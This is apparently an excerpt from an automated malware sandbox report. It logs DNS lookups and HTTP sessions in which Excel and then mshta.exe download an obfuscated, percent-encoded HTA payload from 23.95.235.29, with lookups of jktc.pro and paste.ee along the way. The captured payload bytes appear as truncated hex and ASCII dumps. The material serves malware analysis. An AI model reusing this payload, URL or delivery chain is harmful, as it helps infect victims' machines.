                                                                        Dec 12, 2024 21:38:33.528435946 CET8.8.8.8192.168.2.220x6fc4No error (0)cloudinary.map.fastly.net151.101.1.137A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:33.528435946 CET8.8.8.8192.168.2.220x6fc4No error (0)cloudinary.map.fastly.net151.101.129.137A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:33.528435946 CET8.8.8.8192.168.2.220x6fc4No error (0)cloudinary.map.fastly.net151.101.193.137A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:33.528435946 CET8.8.8.8192.168.2.220x6fc4No error (0)cloudinary.map.fastly.net151.101.65.137A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:33.681866884 CET8.8.8.8192.168.2.220x935fNo error (0)res.cloudinary.comcloudinary.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:33.681866884 CET8.8.8.8192.168.2.220x935fNo error (0)cloudinary.map.fastly.net151.101.193.137A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:33.681866884 CET8.8.8.8192.168.2.220x935fNo error (0)cloudinary.map.fastly.net151.101.1.137A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:33.681866884 CET8.8.8.8192.168.2.220x935fNo error (0)cloudinary.map.fastly.net151.101.65.137A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:33.681866884 CET8.8.8.8192.168.2.220x935fNo error (0)cloudinary.map.fastly.net151.101.129.137A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:35.832986116 CET8.8.8.8192.168.2.220x461No error (0)jktc.pro172.67.163.184A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:35.832986116 CET8.8.8.8192.168.2.220x461No error (0)jktc.pro104.21.34.183A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:35.983839989 CET8.8.8.8192.168.2.220x461No error (0)jktc.pro104.21.34.183A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:35.983839989 CET8.8.8.8192.168.2.220x461No error (0)jktc.pro172.67.163.184A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:36.349375963 CET8.8.8.8192.168.2.220x461No error (0)jktc.pro172.67.163.184A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:36.349375963 CET8.8.8.8192.168.2.220x461No error (0)jktc.pro104.21.34.183A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:36.483887911 CET8.8.8.8192.168.2.220x461No error (0)jktc.pro172.67.163.184A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:36.483887911 CET8.8.8.8192.168.2.220x461No error (0)jktc.pro104.21.34.183A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:36.645009041 CET8.8.8.8192.168.2.220x461No error (0)jktc.pro172.67.163.184A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:36.645009041 CET8.8.8.8192.168.2.220x461No error (0)jktc.pro104.21.34.183A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:50.782927036 CET8.8.8.8192.168.2.220xb416No error (0)res.cloudinary.comcloudinary.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:50.782927036 CET8.8.8.8192.168.2.220xb416No error (0)cloudinary.map.fastly.net151.101.65.137A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:50.782927036 CET8.8.8.8192.168.2.220xb416No error (0)cloudinary.map.fastly.net151.101.129.137A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:50.782927036 CET8.8.8.8192.168.2.220xb416No error (0)cloudinary.map.fastly.net151.101.1.137A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:50.782927036 CET8.8.8.8192.168.2.220xb416No error (0)cloudinary.map.fastly.net151.101.193.137A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:51.059976101 CET8.8.8.8192.168.2.220xe594No error (0)res.cloudinary.comresc.cloudinary.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:54.786691904 CET8.8.8.8192.168.2.220x1c3bNo error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:54.786691904 CET8.8.8.8192.168.2.220x1c3bNo error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:54.921896935 CET8.8.8.8192.168.2.220x1c3bNo error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:54.921896935 CET8.8.8.8192.168.2.220x1c3bNo error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:55.071162939 CET8.8.8.8192.168.2.220x1c3bNo error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:55.071162939 CET8.8.8.8192.168.2.220x1c3bNo error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:55.205213070 CET8.8.8.8192.168.2.220x1c3bNo error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:55.205213070 CET8.8.8.8192.168.2.220x1c3bNo error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:55.341855049 CET8.8.8.8192.168.2.220x1c3bNo error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:55.341855049 CET8.8.8.8192.168.2.220x1c3bNo error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:39:09.333549023 CET8.8.8.8192.168.2.220xee79No error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:39:09.333549023 CET8.8.8.8192.168.2.220xee79No error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:39:09.467956066 CET8.8.8.8192.168.2.220xee79No error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:39:09.467956066 CET8.8.8.8192.168.2.220xee79No error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:39:09.710434914 CET8.8.8.8192.168.2.220xee79No error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:39:09.710434914 CET8.8.8.8192.168.2.220xee79No error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:39:09.833559036 CET8.8.8.8192.168.2.220xee79No error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:39:09.833559036 CET8.8.8.8192.168.2.220xee79No error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:39:09.967777014 CET8.8.8.8192.168.2.220xee79No error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:39:09.967777014 CET8.8.8.8192.168.2.220xee79No error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                        • jktc.pro
                                                                        • res.cloudinary.com
                                                                        • 23.95.235.29
                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.224916223.95.235.29803588C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:38:13.530086040 CET393OUTGET /90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta HTTP/1.1
                                                                        Accept: */*
                                                                        UA-CPU: AMD64
                                                                        Accept-Encoding: gzip, deflate
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                        Host: 23.95.235.29
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:38:14.638873100 CET1236INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:38:14 GMT
                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                        Last-Modified: Thu, 12 Dec 2024 07:14:16 GMT
                                                                        ETag: "14266-6290d7647e9e9"
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 82534
                                                                        Keep-Alive: timeout=5, max=100
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/hta
                                                                        Data Raw: 3c 53 63 72 69 70 74 20 4c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 73 63 72 69 70 74 27 3e 0d 0a 3c 21 2d 2d 20 48 54 4d 4c 20 45 6e 63 72 79 70 74 69 6f 6e 20 70 72 6f 76 69 64 65 64 20 62 79 20 74 75 66 61 74 2e 63 6f 6d 20 2d 2d 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 25 35 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 30 25 34 43 25 36 31 25 36 45 25 36 37 25 37 35 25 36 31 25 36 37 25 36 35 25 33 44 25 32 37 25 34 41 25 36 31 25 37 36 25 36 31 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 37 25 33 45 25 30 41 25 33 43 25 32 31 25 32 44 25 32 44 25 32 30 25 34 38 25 35 34 25 34 44 25 34 43 25 32 30 25 34 35 25 36 45 25 36 33 25 37 32 25 37 39 25 37 30 25 37 34 25 36 39 25 36 46 25 36 45 25 32 30 25 37 30 25 37 32 25 36 46 25 37 36 25 36 39 25 36 34 25 36 35 25 36 34 25 32 30 25 36 32 25 37 39 25 32 30 25 37 34 25 37 35 25 36 36 25 36 31 25 37 34 25 32 45 25 36 33 25 36 46 25 36 44 25 32 30 25 32 44 25 32 [TRUNCATED]
                                                                        Data Ascii: <Script Language='Javascript'>... HTML Encryption provided by tufat.com -->...document.write(unescape('%3C%53%63%72%69%70%74%20%4C%61%6E%67%75%61%67%65%3D%27%4A%61%76%61%73%63%72%69%70%74%27%3E%0A%3C%21%2D%2D%20%48%54%4D%4C%20%45%6E%63%72%79%70%74%69%6F%6E%20%70%72%6F%76%69%64%65%64%20%62%79%20%74%75%66%61%74%2E%63%6F%6D%20%2D%2D%3E%0A%3C%21%2D%2D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%27%25%33%43%25%32%31%25%34%34%25%34%46%25%34%33%25%35%34%25%35%39%25%35%30%25%34%35%25%32%30%25%36%38%25%37%34%25%36%44%25%36%43%25%33%45%25%30%41%25%33%43%25%36%44%25%36%35%25%37%34%25%36%31%25%32%30%25%36%38%25%37%34%25%37%34%25%37%30%25%32%44%25%36%35%25%37%31%25%37%35%25%36%39%25%37%36%25%33%44%25%32%32%25%35%38%25%32%44%25%35%35%25%34%31%25%32%44%25%34%33%25%36%46%25%36%44%25%37%30%25%36%31%25%37%34%25%36%39%25%36%32%25%36%43%25%36%35%25%32%32%25%32%30%25%36%33%25%36%46%25%3
                                                                        Dec 12, 2024 21:38:14.639991999 CET1236INData Raw: 36 25 34 35 25 32 35 25 33 37 25 33 34 25 32 35 25 33 36 25 33 35 25 32 35 25 33 36 25 34 35 25 32 35 25 33 37 25 33 34 25 32 35 25 33 33 25 34 34 25 32 35 25 33 32 25 33 32 25 32 35 25 33 34 25 33 39 25 32 35 25 33 34 25 33 35 25 32 35 25 33 33
                                                                        Data Ascii: 6%45%25%37%34%25%36%35%25%36%45%25%37%34%25%33%44%25%32%32%25%34%39%25%34%35%25%33%44%25%34%35%25%36%44%25%37%35%25%36%43%25%36%31%25%37%34%25%36%35%25%34%39%25%34%35%25%33%38%25%32%32%25%32%30%25%33%45%25%30%41%25%33%43%25%36%38%25%37%34%25%3
                                                                        Dec 12, 2024 21:38:14.640005112 CET1236INData Raw: 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39
                                                                        Data Ascii: 9%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%3
                                                                        Dec 12, 2024 21:38:14.641633034 CET1236INData Raw: 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35
                                                                        Data Ascii: 5%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%2
                                                                        Dec 12, 2024 21:38:14.641645908 CET1236INData Raw: 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30
                                                                        Data Ascii: 0%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%3
                                                                        Dec 12, 2024 21:38:14.647404909 CET1236INData Raw: 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39
                                                                        Data Ascii: 9%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%3
                                                                        Dec 12, 2024 21:38:14.647419930 CET1236INData Raw: 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35
                                                                        Data Ascii: 5%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%2
                                                                        Dec 12, 2024 21:38:14.647577047 CET1236INData Raw: 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30
                                                                        Data Ascii: 0%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%3
                                                                        Dec 12, 2024 21:38:14.647589922 CET1236INData Raw: 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39
                                                                        Data Ascii: 9%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%3
                                                                        Dec 12, 2024 21:38:14.649627924 CET1236INData Raw: 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35
                                                                        Data Ascii: 5%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%2
                                                                        Dec 12, 2024 21:38:14.760844946 CET1236INData Raw: 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30
                                                                        Data Ascii: 0%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%3


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.224916423.95.235.29803880C:\Windows\System32\mshta.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:38:18.455507994 CET470OUTGET /90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: fr-FR
                                                                        UA-CPU: AMD64
                                                                        Accept-Encoding: gzip, deflate
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                        Range: bytes=8897-
                                                                        Connection: Keep-Alive
                                                                        Host: 23.95.235.29
                                                                        If-Range: "14266-6290d7647e9e9"
                                                                        Dec 12, 2024 21:38:19.563499928 CET1236INHTTP/1.1 206 Partial Content
                                                                        Date: Thu, 12 Dec 2024 20:38:19 GMT
                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                        Last-Modified: Thu, 12 Dec 2024 07:14:16 GMT
                                                                        ETag: "14266-6290d7647e9e9"
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 73637
                                                                        Content-Range: bytes 8897-82533/82534
                                                                        Keep-Alive: timeout=5, max=100
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/hta
                                                                        Data Raw: 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 [TRUNCATED]
                                                                        Data Ascii: 5%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25
                                                                        Dec 12, 2024 21:38:19.564143896 CET1236INData Raw: 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25
                                                                        Data Ascii: %30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%33%44%25%30%39%25
                                                                        Dec 12, 2024 21:38:19.564157009 CET1236INData Raw: 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25
                                                                        Data Ascii: %39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%36%33%25%35%32%25%36%35%25%36%31%25%35%34%25%34%35%25%36%46%25%34%32%25%36%41%25%34%35%25%34%33%25%35%34%25%30%39%25%30%39%25%30%39%25%30%39%25%30
                                                                        Dec 12, 2024 21:38:19.566509008 CET1236INData Raw: 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 32 25 33 38 25 32 35 25 33 30 25 33 39 25
                                                                        Data Ascii: %25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%32%38%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39
                                                                        Dec 12, 2024 21:38:19.566521883 CET1236INData Raw: 25 33 33 25 33 37 25 32 35 25 33 32 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25
                                                                        Data Ascii: %33%37%25%32%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25
                                                                        Dec 12, 2024 21:38:19.569093943 CET1236INData Raw: 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25
                                                                        Data Ascii: %39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30
                                                                        Dec 12, 2024 21:38:19.569108963 CET1236INData Raw: 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25
                                                                        Data Ascii: %25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39
                                                                        Dec 12, 2024 21:38:19.571722984 CET1236INData Raw: 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25
                                                                        Data Ascii: %30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25
                                                                        Dec 12, 2024 21:38:19.571772099 CET1236INData Raw: 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25
                                                                        Data Ascii: %39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30
                                                                        Dec 12, 2024 21:38:19.574285984 CET1236INData Raw: 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25
                                                                        Data Ascii: %25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39
